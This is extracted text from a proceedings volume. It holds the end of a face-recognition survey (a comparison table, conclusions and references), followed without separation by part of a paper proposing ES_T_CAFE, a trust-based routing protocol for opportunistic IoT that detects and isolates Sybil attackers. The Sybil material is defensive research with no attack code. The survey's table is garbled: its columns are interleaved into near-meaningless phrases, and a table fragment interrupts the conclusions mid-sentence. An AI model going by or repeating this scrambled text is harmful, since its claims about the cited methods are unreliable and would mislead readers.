role in determining the true meaning of the pictures. In this paper, we present
the latest literature on face-specific problems and solutions and try to highlight the
best solutions to these face-related problems.
Table 2 (continued)
Technique Result Merit Demerit
Facial action units(AUs) They have provided to They have used color They have not
[18] identification of AUs model for detecting to AU provided good
using color features in activation efficiency in skin
datasets color
Single image super SISR have given good They have performed They have not
resolution, CNN [19] result in similar domain better result in self leaded to training
using 1D wiener filtering -similar object and relies input
images
Cross-age face These methods improved They have work on They have not
verification [20] over the performance from effectively balance feature provided good
2.2% EER on MORPH sharing and feature result in small
7.8% EER on FG-NET by exclusion between the two datasets and also a
more than 50 and 59.7% tasks large number of
datasets
Temporal non-volume They have consecutively They have guaranteed This method has a
preserving (TNVP), worked on synthesizing inference and evaluate the big issue to solve
generative adversarial age progressed faces and feature in consecutive large-scale
networks (GAN) [21] cross-age face verification stages problem
Visual versus near infrared This technique achieves They have provided good We observe that
(VIS–NIR), invariant deep 94% verification rate result and reduces the IDR are almost
representation (IDR) [22] large-scale VIS data error rate of 58% only obtain the lowest
with a compact 64D performance
representation among the three
implementation
Learning displacement LDF-NET achieved They have provided good They have
field network(LDF-NET) frontal image using useful face recognition using perform low
[23] information in original MultiPIE datasets efficient better
images than 2D
Deep convolution neutral They have reduced the A face image recognize This algorithm is
network (DCNN) [24] error rate of 80.7–32.5 in 3D Morphable model to using primary the
real-world forensic images improve facial features in limited number
new images sketches images
available
Single deep convolution This model has a better This method performed FDDB has failed
neutral network(SDCNN), understand to the faces better than HyperFace to capture small
multi-task learning frame and achieved good result using MTL frameworks faces in any region
work (MTL) [25] for most of these tasks of the proposal
Bench mark task [26] This approach has worked They have worked on This method does
on testing databases large datasets to solve not remove noise
representing 75% of classification problem in from datasets
celebrities names. This computer vision and there
accepts the applications
disambiguation property
of human expression
Automatic facial action STM has capable to detect STM has extended the It has found
unit (AU), selective and improve both AU and classifier with losses of common feedback
transfer machine (STM) holistic expression. They convex decision and in supervised
[27] have improving the logistic expressions domain and lack
performance of selected of training
samples in a nearest test datasets
samples
Semi-non-negative matrix This model has worked on They have not provided They are not able
factorization [28] to learn the good result in datasets. to solve the area of
two-dimensional They have worked on speech recognition
representation. They have annotated attributes and
provided a good result in different data sources
classification and
clustering
Pose aware models This model has to design They have analysis of These models
(PAM), CNN [29] for solving the regular IJB-A. They have have worked on
problem and optimizes the evaluated landmarks and only training
point and loss improve the accuracy of PAMs with a
minimization pose estimation single
optimization
framework
Hierarchical method These models have These experiments This method is not
based on two level improved the accuracy of perform better result in work better in
learning, local pattern 94.2% using LPS MORPH, Album2 datasets low-level images
selection (LPS) [30]
VGG framework, CNN It have worked on They have provided a They have find in
[31] pre-processed the face multiple features in faces limited data
recognition and provide a and evaluated a n under provided by the
powerful representation various circumstances mismatched
conditions
Gesture recognition They have provided SSVM framework has They have not
method, conditional effective gesture and face found novel gesture evaluated criteria
random field (CRF), recognition in challenging recognition in CRF model. itself in proposed
structural support vector real gesture-based datasets They have worked on datasets
machine (SSVM) [32] multiple features in
matching algorithms
A priorly trained base 3D construction of human Proposed method Proposed method
poses, predefined motion from monocular performs well under working good
skeletion anthropometrics image sequence. Using occlusions, noise and result on
constraints [33] periodic functions to real-world data of the high-level noise of
model the weights of the KTH datasets as well as the reconstruction.
base poses turned out to our outdoor obstacle jump They are not
be very effective and sequence finding better
stable on periodic motion result on low-level
noise
Latest low rank Proposed method find On larger scale datasets by In the same spirit,
representation (LatLRR), better classification results adopting the Ll-filtering we will try
PCA [34] other than algorithms. They have integrating other
representation-based given better performance feature learning
method and even with a than other algorithms methods with
simpler linear more sophisticated
classification classification array
Multiple This approach has work They have performed These datasets has
representation-based face superior performance in forensic sketch datasets work very less size
sketch photo synthesis multiple datasets using using dependent style to so unfortunately it
(MrFSPS), Markow existing method and improve the face has not easy to
model [35] quality-based recognition promising find exact result of
performance results large number
Single image super The proposed SRCNN has They have learnt end to The extra activity
resolution deep CNN capable to improve the end communication using has explored more
(SRCNN) [36] reconstruction of images low-level and high-level filters using other
in natural corresponding resolutions training strategies
channels
Compact binary face These have worked on They have applied They have learned
descriptor (CBFD), pixel heterogeneous face different—different only single layer
different vectors (PDVs), recognition. They have application of face datasets nor for all
coupled-CBFD(CC-BFD) reduces the modality gap recognition. They have datasets
[37] in datasets using work on object
heterogeneous face recognition and visual
through matching tackling
Multi-state selection This method has They have provides They have not
graph(MSG) [38] incorporates an indicator general and global given exact
matrix. They have framework. They have performance every
handling accurate value of allowed optimization for video
missing common extending standard graph
foreground object in some models
videos
Multitask feature They have applied They have slightly They have
transformation arbitrary poses I face modified to tackle the inoculated
learning(MTFTL), images. There is a very unconstrained face different pose in
patch-based partial beneficial for existing verification problem. They face texture
representation(PBPR) method have find top level
[39] performance in
challenging datasets
7 Conclusions

This paper analyzed systematic studies of facial recognition and machine learning
techniques, covering numerous approaches and datasets. It includes a detailed
review of face detection and recognition using the various techniques proposed by
researchers. Machine learning approaches solve numerous problems related
Table 2 (continued)
Technique Result Merit Demerit
software-based fake This method has to able to They have to provide new This approach is
detection method [40] perform high level for possibilities evaluation of perform better in
different biometric traits. future including high level not in
They have solved the evaluation, inclusion and low-level attacks
problem in different type used of video quality
of attacks measures
Gabor and local binary They have learnt to reduce This has a good Proposed DFD
patterns, discriminant face image filters with generalization and does not work on
descriptor (DFD), heterogeneous gap in face competitive descriptor in video-based
coupled-DFD(CDFD) images. They have face recognition under analysis
[41] examined both various circumstances
constrained and
unconstrained face
databases
High-level feature They have produces a They have reduced one to This method is
learning scheme [42] novel technique. To work one and many-to-one working on
on many-to-one high-level encoder to remove the high-level feature
face feature learning. impact diverse poses in learning
These have extracted future. It has enhanced the
invariant and pose free features in
discriminative identity multiple random faces
face features from facial
images
CNN, 3DCNN [43] They have the These models have 3DCNN is work a
characteristics derived in outperform compared to supervised
spatial as well as temporal TRECVID data, while learning training
dimensions. They have 3D they have achieved better data not are work
convolutions performed to performance in KTH on unsupervised
record the wave, details in database training database
encoded several adjacent
objects

to pattern identification, facial expression recognition, and scanning recognition.


Deep learning techniques are considered here for the identification and recognition of
constrained and unconstrained faces processed from real photos and images. This
paper highlighted state-of-the-art technologies and their approaches to facial recognition
and identification using facial charts, images, and real-time videos. It can
be seen that as more neural connections, pooling layers, and fully connected
layers are applied to the problems encountered in visualizing the images, the
outcomes become stronger. The authors also discussed accuracy, the main factor that
determines the value of the implemented techniques. This paper helps
upcoming researchers obtain a concise overview of the numerous techniques
that can be applied to image processing and facial recognition and identification.
References

1. Shao, M., Zhang, Y., & Fu, Y. (2018). Collaborative random faces-guided encoders for pose-
invariant face representation learning. IEEE Transactions on Neural Networks and Learning
Systems, 29(4), 1019–1032.
2. Tsai, C. C., Li, W., Hsu, K. J., Qian, X., & Lin, Y. Y. (2019). Image co-saliency detection and
co-segmentation via progressive joint optimization. IEEE Transactions on Image Processing,
28(1), 56–71.
3. Hu, Z., Cho, S., Wang, J., & Yang, M. H. (2014). Deblurring low-light images with light
streaks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition
(pp. 3382–3389).
4. Anwar, S., Huynh, C. P., & Porikli, F. (2018). Image deblurring with a class-specific prior. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
5. Wang, X., Ma, H., Chen, X., & You, S. (2018). Edge preserving and multi-scale contextual
neural network for salient object detection. IEEE Transactions on Image Processing, 27(1),
121–134.
6. Deng, W., Hu, J., & Guo, J. (2018). Compressive binary patterns: Designing a robust binary face
descriptor with random-field eigenfilters. IEEE Transactions on Pattern Analysis & Machine
Intelligence, 1, 1–1.
7. Jerripothula, K. R., Cai, J., & Yuan, J. (2018). Quality-guided fusion-based co-saliency
estimation for image co-segmentation and co-localization. IEEE Transactions on Multimedia.
8. Tulyakov, S., Jeni, L. A., Cohn, J. F., & Sebe, N. (2018). consistent 3D face alignment. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 40(9), 2250–2264.
9. Dong, X., Zheng, L., Ma, F., Yang, Y., & Meng, D. (2018). Few-example object detection with
model communication. IEEE Transactions on Pattern Analysis & Machine Intelligence, 1, 1–1.
10. Mafi, M., Rajaei, H., Cabrerizo, M., & Adjouadi, M. (2018). A robust edge detection approach
in the presence of high impulse noise intensity through switching adaptive median and fixed
weighted mean filtering. IEEE Transactions on Image Processing, 27(11), 5475–5490.
11. Tao, D., Guo, Y., Li, Y., & Gao, X. (2018). Tensor rank preserving discriminant analysis for
facial recognition. IEEE Transactions on Image Processing, 27(1), 325–334.
12. Wang, W., Yan, Y., Cui, Z., Feng, J., Yan, S., & Sebe, N. (2018). Recurrent face aging with
hierarchical autoregressive memory. IEEE Transactions on Pattern Analysis and Machine
Intelligence.
13. Jeong, S., Lee, J., Kim, B., Kim, Y., & Noh, J. (2018). Object segmentation ensuring consis-
tency across multi-viewpoint images. IEEE Transactions on Pattern Analysis and Machine
Intelligence, 40(10), 2455–2468.
14. Sagonas, C., Ververas, E., Panagakis, Y., & Zafeiriou, S. (2018). Recovering joint and individual
components in facial data. IEEE Transactions on Pattern Analysis and Machine Intelligence,
40(11), 2668–2681.
15. Zhu, X., Lei, Z., & Li, S. Z. (2017). Face alignment in full pose range: A 3D total solution. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
16. Wang, M., & Deng, W. (2018). Deep face recognition: A survey. arXiv preprint arXiv:1804.
06655.
17. Qian, Y., Deng, W., & Hu, J. (2018, May). Task specific networks for identity and face variation.
In 2018 13th IEEE International Conference on Automatic Face & Gesture Recognition (FG
2018) (pp. 271–277). IEEE.
18. Benitez-Quiroz, F., Srinivasan, R., & Martinez, A. M. (2018). Discriminant functional learning
of color features for the recognition of facial action units and their intensities. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
19. Cruz, C., Mehta, R., Katkovnik, V., & Egiazarian, K. O. (2018). Single image super-resolution
based on Wiener filter in similarity domain. IEEE Transactions on Image Processing, 27(3),
1376–1389.
20. Wang, X., Zhou, Y., Kong, D., Currey, J., Li, D., & Zhou, J. (2017, May). Unleash the black
magic in age: a multi-task deep neural network approach for cross-age face verification. In 2017
12th IEEE International Conference on Automatic Face & Gesture Recognition (FG 2017)
(pp. 596–603). IEEE.
21. Duong, C. N., Quach, K. G., Luu, K., Le, T. H. N., & Savvides, M. (2017, Oct). Temporal
non-volume preserving approach to facial age-progression and age-invariant face recognition.
In 2017 IEEE International Conference on Computer Vision (ICCV) (pp. 3755–3763). IEEE.
22. He, R., Wu, X., Sun, Z., & Tan, T. (2017). Learning Invariant Deep Representation for NIR-VIS
Face Recognition. In AAAI (Vol. 4, pp. 7).
23. Hu, L., Kan, M., Shan, S., Song, X., & Chen, X. (2017, May). LDF-Net: Learning a
displacement field network for face recognition across pose. In 2017 12th IEEE International
Conference on Automatic Face & Gesture Recognition (FG 2017) (pp. 9–16). IEEE.
24. Galea, C., & Farrugia, R. A. (2017). Forensic face photo-sketch recognition using a deep
learning-based architecture. IEEE Signal Processing Letters, 24(11), 1586–1590.
25. Ranjan, R., Sankaranarayanan, S., Castillo, C. D., & Chellappa, R. (2017, May). An all-in-one
convolutional neural network for face analysis. In 2017 12th IEEE International Conference
on Automatic Face & Gesture Recognition (FG 2017) (pp. 17–24). IEEE.
26. Guo, Y., Zhang, L., Hu, Y., He, X., & Gao, J. (2016, Oct). Ms-celeb-1m: A dataset and
benchmark for large-scale face recognition. In European Conference on Computer Vision
(pp. 87–102). Springer, Cham.
27. Chu, W. S., De la Torre, F., & Cohn, J. F. (2017). Selective transfer machine for personalized
facial expression analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence,
39(3), 529–545.
28. Trigeorgis, G., Bousmalis, K., Zafeiriou, S., & Schuller, B. W. (2017). A deep matrix factor-
ization method for learning attribute representations. IEEE Transactions on Pattern Analysis
and Machine Intelligence, 39(3), 417–429.
29. Masi, I., Chang, F. J., Choi, J., Harel, S., Kim, J., Kim, K., & AbdAlmageed, W. (2018).
Learning pose-aware models for pose-invariant face recognition in the wild. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
30. Li, Z., Gong, D., Li, X., & Tao, D. (2016). Aging face recognition: A hierarchical learning model
based on local patterns selection. IEEE Transactions on Image Processing, 25(5), 2146–2154.
31. Mehdipour Ghazi, M., & Kemal Ekenel, H. (2016). A comprehensive analysis of deep learning
based representation for face recognition. In Proceedings of the IEEE Conference on Computer
Vision and Pattern Recognition Workshops (pp. 34–41).
32. Chang, J. Y. (2016). Nonparametric feature matching based conditional random fields for
gesture recognition from multi-modal video. IEEE transactions on pattern analysis and
machine intelligence, 38(8), 1612–1625.
33. Wandt, B., Ackermann, H., & Rosenhahn, B. (2016). 3d reconstruction of human motion from
monocular image sequences. IEEE Transactions on Pattern Analysis and Machine Intelligence,
38(8), 1505–1516.
34. Zhou, P., Lin, Z., & Zhang, C. (2016). Integrated low-rank-based discriminative feature learning
for recognition. IEEE Transactions on Neural Networks and Learning Systems, 27(5), 1080–
1093.
35. Peng, C., Gao, X., Wang, N., Tao, D., Li, X., & Li, J. (2016). Multiple Representations-Based
Face Sketch-Photo Synthesis. IEEE Transactions on Neural Networks and Learning Systems,
27(11), 2201–2215.
36. Dong, C., Loy, C. C., He, K., & Tang, X. (2016). Image super-resolution using deep convo-
lutional networks. IEEE Transactions on Pattern Analysis and Machine Intelligence, 38(2),
295–307.
37. Lu, J., Liong, V. E., Zhou, X., & Zhou, J. (2015). Learning compact binary face descriptor for
face recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 37(10),
2041–2056.
38. Fu, H., Xu, D., Zhang, B., Lin, S., & Ward, R. K. (2015). Object-based multiple foreground
video co-segmentation via multi-state selection graph. IEEE Transactions on Image Processing,
24(11), 3415–3424.
39. Ding, C., Xu, C., & Tao, D. (2015). Multi-task pose-invariant face recognition. IEEE
Transactions on Image Processing, 24(3), 980–993.
40. Galbally, J., Marcel, S., & Fierrez, J. (2014). Image quality assessment for fake biometric
detection: Application to iris, fingerprint, and face recognition. IEEE Transactions on Image
Processing, 23(2), 710–724.
41. Lei, Z., Pietikäinen, M., & Li, S. Z. (2014). Learning discriminant face descriptor. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 36(2), 289–302.
42. Zhang, Y., Shao, M., Wong, E. K., & Fu, Y. (2013). Random faces guided sparse many-to-
one encoder for pose-invariant face recognition. In Proceedings of the IEEE International
Conference on Computer Vision (pp. 2416–2423).
43. Ji, S., Xu, W., Yang, M., & Yu, K. (2013). 3D convolutional neural networks for human action
recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(1), 221–231.
An Energy- and Space-Efficient
Trust-Based Secure Routing for OppIoT

Nisha Kandhoul and Sanjay K. Dhurandher

Abstract Internet of Things (IoT) is a collection of Internet-connected devices,
sensors or humans, having sensing and data sharing capabilities. Opportunistic net-
works (OppNets) are a subclass of DTN characterized by intermittent connectivity
and varying network topology. Opportunistic Internet of Things (OppIoT ) brings the
flexibility of OppNets to IoT where the opportunistic nature of human contacts is
utilized for data sharing among devices and humans. The excessive heterogeneity of
devices and vast scale of OppIoT systems magnify the security threats. Users' data
are insecure as they are exposed to attacks from uncertified users or devices present
across the network. In addition to ensuring the security, the efficiency of the routing
procedures needs to be addressed. The network is usually composed of battery and
space-limited devices with constrained storage. Considering the power and space
constraints of the devices while protecting the data is important for OppIoT. This
paper proposes a secure, energy- and space-efficient technique based on trust for
OppIoT that provides defense against Sybil attack called ES_T_CAFE. The simu-
lation results obtained using opportunistic network environment (ONE) simulator
show that ES_T_CAFE enhances the efficiency of the network and provides security
against Sybil attack. ES_T_CAFE outperforms existing routing protocols, T_CAFE
and ELPFR-MC, in terms of higher probability of message delivery, lower count of
dropped messages and higher residual energy.

Keywords Opportunistic Internet of Things · Energy efficiency · Space
efficiency · Trust · Sybil attack

N. Kandhoul (B)
Division of Information Technology, NSIT, University of Delhi, New Delhi, India
S. K. Dhurandher
Department of Information Technology, Netaji Subhas University of Technology, New Delhi,
India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 127
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_10
1 Introduction

Internet of Things [1] is a collection of Internet-connected devices, sensors, smart
phones, possessing ability for sharing and collection of data. IoT is omnipresent and
has a wide range of applications like health care, geographical location monitoring,
etc. A class of delay-tolerant networks is opportunistic networks [2] where the net-
work topology is dynamic and the messages are transmitted in a store-carry-forward
fashion. Opportunistic IoT [3] is based on the combined concepts of IoT and OppNets
where humans participate alongside the IoT devices. The wide spectrum of OppIoT devices
and broadcast mode of data sharing pose a threat to security of data and privacy of
the users [4]. In addition to this, designing an efficient secure routing approach is the
need of the hour as the devices have limited storage and battery capacity. The success
of a secure routing approach is dependent on how efficiently it manages space and
energy.
Traditional approaches of data encryption [5] are not able to address the attacks
efficiently as they require availability of the network continuously and fail to handle
attackers present inside the network. Another issue with these approaches is the
sharing and management of keys. This requires devising trust-based strategies [6].
Trust represents the faith of a node in others regarding their future behavior in the
network.
This paper proposes an efficient version of T_CAFE which is a secure trust-based
routing approach for OppIoT [7]. The next hop selection is based on the hop’s current
energy level, its residual buffer and the trust value. Trust is calculated by taking
a weighted average of direct trust and indirect trust value. This scheme provides
defense against Sybil attack [8]. Sybil attacker generates multiple forged identities
on a device concurrently for obstructing the correct operation of the network. Sybils
try to raise their own trust and reduce the trust of other nodes in the network. The
major contributions of this work include
• Energy-aware next hop selection: The next hop is selected such that it has higher
residual energy than the carrier node. If a node has sufficient battery power, then
only the chances of it delivering a packet to the destination are higher.
• Space-efficient forwarding decision: A packet is forwarded to the neighboring
node if it has sufficient buffer to hold the packet, and its residual space is higher
than the carrier node. Higher residual space implies that the chances of a packet
getting dropped are low.
• Trust-based security: A reputation system is designed based on the trust values
of the nodes. Packets are forwarded to nodes with higher trust values.
• Detection and isolation of Sybil attackers: The proposed approach successfully
isolates attackers from the process of packet transmission.
This paper is arranged as follows. A survey of the literature work in the field
of security of OppIoT is given in Sect. 2. Section 3 provides the details of the pro-
posed ES_T_CAFE. Simulation results are discussed in Sect. 4. Section 5 gives a
brief conclusion of the work.

2 Related Work

In this section, existing works related to the energy and security of OppIoT networks
are discussed.
Gao et al. [9] presented a routing protocol that is efficient in terms of energy, and
the forwarding decision is based on speed and residual energy of a node for preventing
unnecessary accumulation of data and uncontrolled spraying. The protocol utilizes
energy efficiently. However, the protocol assumes a sink node that possesses unlim-
ited memory, power and computation capacity, which is unrealistic. It is based on the
assumption that all nodes have equal communication range which is not possible in
real scenarios. Chilipirea et al. [10] proposed an energy-aware extension of BUBBLE
Rap routing protocol for opportunistic networks that combined energy optimization
with socially aware routing for balancing the energy consumption. A node with high
social importance was ranked higher and chosen for routing which led to its energy
getting drained. Thus, this protocol added the updated utility function such that its
value decreases if a node has lower energy value. This led to a reduction in the nodes
probability of acting as a successful carrier of message. This approach did not address
the security issues. Duan et al. [11] proposed a game theoretic risk strategy model for
determining the trust of nodes in the network. Using Nash equilibrium, probability
of the selected strategy was calculated. The energy cost was considered to be pro-
portional to the trust. The system used watchdog mechanism which added overhead
to the system. Each node makes a trust request to which the neighbors respond with
recommendations, and this adds too much overhead and thus wastes energy which is
contradictory to the energy saving goal. SOA-based security protocol was given by
Chen et al. [6] where the trust is computed using collaborative filtering of feedback
based on social contacts, interest relationships community and similarity rating of
friendship. Sharma et al. [12] proposed a secure defense against blackhole and grey-
hole attacks based on history data. It made predictions about behavior considering
the average time for forwarding.
M. Bala Krishna [13] proposed a trust-based secure opportunistic technique for message
transmission in IoT networks using delay-aware secure hashing (DASHOP). The
base stations were assumed to be trusted for coordinating with other nodes. Keys
are generated using the elliptic curve digital signature algorithm. The computation
intensive elliptic curve digital signature approach was used, and the limited power of
the nodes was not taken into consideration. Dhurandher et al. [14] proposed a trust-
and cryptography-based security approach. This scheme made lots of computations
and assumed too much infrastructure. Borah et al. [15] presented ELPFR-MC, a
location predicting protocol that is energy aware and makes routing decision based
on current energy level of a node and its probability of message delivery to the des-
tination. This is an energy-aware protocol, and security is not implemented while
performing message routing. RSA-based secure routing protocol was proposed by
Kandhoul et al. [16] for OppIoT. This scheme used RSA for message encryption and
detected packet fabrication attack. The efficiency of the routing protocol was not
considered.
3 Proposed ES_T_CAFE Protocol

This section elaborates the proposed ES_T_CAFE protocol.

3.1 Motivation

OppIoT is assumed to comprise a wide range of devices like small sensors, power-
limited devices and so on. The devices are constrained in terms of storage and battery.
In addition to limited power and space, another challenge is the secure transmission
of data, as in OppIoT the data is broadcast to neighbors, revealing it to
attackers as well. Thus, the current scenario calls for the design of secure data sharing
techniques that are energy and space efficient. The work in the literature has not given
much importance to limited space and power. T_CAFE is a trust-based protocol that
protects the network from several attacks. But it does not consider the constrained
energy and storage of the devices involved in the network. The malicious nodes waste
the storage by sending fake messages and drain the energy resources of the nodes by
engaging them in unnecessary packet forwarding. This has motivated us in designing
an energy- and space-efficient version of T_CAFE called as ES_T_CAFE.

3.2 Proposed Protocol

ES_T_CAFE considers that all the member nodes of OppIoT cooperate with one
another for message transmission. It is also assumed that the nodes have sufficient
buffer capacity for storing their context information. Some of the nodes behave
maliciously and execute Sybil attack in the network.
Each node maintains a table of already detected malicious hosts. Upon encounter
with a node, the carrier node checks if the node is malicious. If yes, it waits for some
other node. If the node is benign, it checks its residual buffer space and energy. If
the node does not have sufficient space, the chances of a packet getting dropped are
high. Similarly, if the power is low, the node might not be able to sustain the packet
forwarding procedure, thus reducing the packet delivery probability. The residual
energy is normalized as follows:

Residual_Energy_carrier = get_current_Energy() / get_initial_energy()    (1)

Similarly, the residual buffer space for the carrier is calculated as

Residual_Buffer_carrier = get_Free_Buffer_Size() / get_Buffer_Size()    (2)
The normalization performed above is necessary to bring the values in the range of
0 to 1. Finally, the ES parameter is computed as

ES_carrier = (α ∗ Residual_Energy + β ∗ Residual_Buffer)    (3)

where α + β = 1. The α and β parameters are used to control the weightage given to
the energy and space components. The ES_Threshold is computed by taking an average
of the ES values of all the neighbors of the carrier as

ES_Threshold = (Σ_{node=1}^{n} ES_node) / count    (4)
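To make the forwarding metric concrete, the computation of Eqs. (1)-(4) can be sketched in a few lines of Python. This is only an illustrative sketch, not the authors' implementation; the node object with its current_energy, initial_energy, free_buffer and buffer_size fields, and the equal weights alpha = beta = 0.5, are assumptions made here.

    # Illustrative sketch of Eqs. (1)-(4); the node fields and weight values are assumed.
    def es_value(node, alpha=0.5, beta=0.5):
        residual_energy = node.current_energy / node.initial_energy  # Eq. (1)
        residual_buffer = node.free_buffer / node.buffer_size        # Eq. (2)
        return alpha * residual_energy + beta * residual_buffer      # Eq. (3), alpha + beta = 1

    def es_threshold(neighbours):
        # Eq. (4): average ES value over the carrier's current neighbours
        values = [es_value(n) for n in neighbours]
        return sum(values) / len(values) if values else 0.0

A candidate next hop is considered further only when its ES value is at least this neighbourhood average, which prevents packets from being handed to nodes that are poorer than their surroundings in energy or free buffer.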
If ES_node is greater than ES_Threshold, the next step is to compare its trust.
The total trust is computed as a weighted combination of the direct trust, derived from
the node's observed social behavior, and the indirect trust, derived from the recommendations
received from neighboring nodes. The details of the trust computation have already been
given in [7]. If any two neighbors are similar to one another beyond a threshold,
they are considered to be performing a Sybil attack. The attackers thus detected are added
to the malicious table, thereby identifying the Sybil nodes and successfully excluding them
from participation in packet transmission. If a neighbor possesses a high trust value,
the message is forwarded to it; otherwise, the carrier waits for a better message forwarder.
A sketch of this trust combination is given below; the entire routing process is described in Algorithm 1.
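The following minimal sketch illustrates the trust combination. The weight constants θ, δ, γ, λ (for the direct trust), σ and ω (for combining direct and indirect trust) and the aging factor φ come from [7]; the numeric values and function names used here are only illustrative assumptions, not the authors' code.

    import math

    # Assumed illustrative weights; the scheme only requires THETA+DELTA+GAMMA+LAM = 1.
    THETA, DELTA, GAMMA, LAM = 0.25, 0.25, 0.25, 0.25
    SIGMA, OMEGA, PHI = 0.6, 0.4, 0.1

    def direct_trust(copr, amiability, fwd_ratio, enc_ratio):
        # Weighted sum of the observed social-behaviour metrics (Algorithm 1, step 23)
        return THETA * copr + DELTA * amiability + GAMMA * fwd_ratio + LAM * enc_ratio

    def aged_direct_trust(previous_trust, elapsed_time):
        # Exponential aging applied when no recommendations are received (step 28)
        return math.exp(-PHI * elapsed_time) * previous_trust

    def total_trust(direct, recommendations):
        # Indirect trust is the mean of the neighbours' direct trust in the trustee (steps 33 and 36)
        if not recommendations:
            return direct
        indirect = sum(recommendations) / len(recommendations)
        return SIGMA * direct + OMEGA * indirect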

4 Performance Evaluation

Opportunistic network environment (ONE) [17] is used for simulating the proposed
ES_T_CAFE protocol. The real data traces cambridge/haggle/imote [18] of INFOCOM
2006 are used for the simulation. This dataset has four traces of Bluetooth
sightings of 98 users possessing iMote devices over 337,418 s. The performance of
ES_T_CAFE is evaluated and compared with the results for the T_CAFE and ELPFR-
MC protocols, under varying buffer size, time to live and interval of message gener-
ation. The simulation specifications are provided in Table 1. The TTL of messages
is set as 100 min. Every simulation is executed for 337,418 s. A message of size
500 kB–1 MB is created every 25–35 s.
Firstly, the buffer size is varied, and its impact is noted on simulation metrics
as shown in Figs. 1, 2, 3 and 4. The impact of varying buffer size is noted on
delivery probability in Fig. 1. With increasing buffer size, the delivery probabil-
ity also increases as there are fewer chances of packets getting dropped with a higher
buffer size. This is also the reason for the reduction in the count of messages dropped with
increased buffer, as shown in Fig. 3. The average probability of message delivery for
ES_T_CAFE is 0.41, which is 5.4% higher than T_CAFE and 18% higher than ELPFR-
MC. The average count of dropped packets for ES_T_CAFE is 10.8% lower than
T_CAFE and 21% lower as compared to ELPFR-MC.
Algorithm 1: ES_T_CAFE
1: Begin
2: Initialize Trust = 0.5 for every node.
3: For the present situation, node A is considered as the Trustor and B is assumed to be the Trustee.
4: if (Malicious_table.containsKey(B)) then
5:    continue; wait for a benign node.
6: else
7:    Compute Residual_Energy as: Residual_Energy_B = get_current_Energy() / get_initial_energy()
8:    Compute Residual_Buffer as: Residual_Buffer_B = get_Free_Buffer_Size() / get_Buffer_Size()
9:    Compute ES as: ES_B = (α ∗ Residual_Energy + β ∗ Residual_Buffer)
10: end if
11: Compute ES_Threshold as: ES_Threshold = (Σ_{node=1}^{n} ES_node) / count
12: if (ES_B < ES_Threshold) then
13:    continue; wait for a better carrier.
14: else
15:    for every neighbor (Neigh_i) of A do
16:       Calculate the packet forwarding ratio: FwR_AB = n_{A,B} / n_{Total_B}
17:       Compute amiability as: Freq_AB = (f_{A,B} + f_{B,D}) / (f_{A_Total} + f_{B_Total}),
          Dur_AB = (d_{A,B} + d_{B,D}) / (d_{A_Total} + d_{B_Total}),
          Rec_AB = (r_{A,B} + r_{B,D}) / (r_{A_Total} + r_{B_Total}),
          Amb = Freq + Dur + Rec
18:       Calculate the encounter ratio with respect to destination D: EncR_BD = c_{B,D} / c_{Total_B}
19:       if ((Amb + EncR) > Sybil_threshold) then
20:          Add Neigh_i to Malicious_table as a Mal_Sybil node.
21:       end if
22:       Calculate the correctly delivered packets ratio: CoPR_AB = Correct_Packets_Forwarded_{A,B} / Total_Packets_Received_B
23:       Calculate the Direct Trust: Direct_Trust_{A,B} = θ ∗ CoPR + δ ∗ Amb + γ ∗ FwR + λ ∗ EncR,
          where θ, δ, γ, λ are constants whose sum equals 1.
24:    end for
25: end if
26: A takes recommendations regarding B from neighbors.
27: if (count(recommendations) = 0) then
28:    Aging of the direct trust is performed: Dt_Trust(t)_{A,B} = e^(−φt) ∗ Direct_Trust(t − 1); Direct_Trust_{A,B} = Dt_Trust(t)_{A,B}
29: else
30:    if (Malicious_table.containsKey(Neigh_i)) then
31:       Encountered node is malicious; continue.
32:    else
33:       Calculate the Indirect Trust of A on B: Indirect_Trust_{A,B} = (Σ_{i=0}^{N} Direct_Trust_{Neigh_i,B}) / N
34:    end if
35: end if
36: Calculate the total Trust: Trust_{A,B} = σ ∗ Direct_Trust_{A,B} + ω ∗ Indirect_Trust_{A,B}
37: if (Trust_{A,B} > Trust_A) then
38:    Send the packet to B.
39: else
40:    Wait until a better carrier is encountered.
41: end if
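For readability, the per-encounter decision of Algorithm 1 can be condensed into the following Python sketch. The function and parameter names, the Sybil threshold value and the reduction of the steps to boolean checks are simplifications introduced here for illustration; they are not the authors' code.

    def is_sybil(amiability, encounter_ratio, sybil_threshold=1.5):
        # Step 19: flag a neighbour whose combined amiability and encounter ratio
        # exceeds the (assumed) Sybil threshold as a forged identity.
        return (amiability + encounter_ratio) > sybil_threshold

    def forward_to(encountered_is_malicious, encountered_es, threshold_es,
                   trust_in_encountered, carrier_trust):
        # Steps 4-5: never hand packets to a node already in the malicious table.
        if encountered_is_malicious:
            return False
        # Steps 11-13: reject nodes whose energy/space metric is below the threshold.
        if encountered_es < threshold_es:
            return False
        # Steps 36-41: forward only when the encountered node is more trusted than the carrier.
        return trust_in_encountered > carrier_trust

A carrier would evaluate is_sybil for every neighbour while updating its malicious table, and then call forward_to with the values produced by es_value, es_threshold and total_trust sketched above to decide whether the encountered node becomes the next hop.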
Table 1 Specifications for simulation

Specification Value
Simulation area 1000 m × 1000 m
Transmission range 10 m
Power of transmission 15 dB
Buffer size 100 MB
Response scanning energy 0.08 J
Movement model Stationary movement
Device type iMote
Duration 337,418 s (approximately 3.91 days)
Energy of transmission 0.5 J
Contact count 170,601
Energy for scanning 0.06 J
Coefficient of charging 20 J
Base energy 0.07 J

Fig. 1 Delivery probability versus buffer size (ELPFR-MC, T_CAFE, ES_T_CAFE)

Figure 2 shows the impact of increasing buffer size on the residual energy level of
a node at the completion of the simulation. As the buffer size increases, there are
fewer chances of a packet getting dropped, thereby saving the node’s energy. Thus, with
increasing buffer size, the leftover energy of a node also increases. The average value
of leftover energy for ES_T_CAFE is 2344.67 J, which is 11% higher than T_CAFE
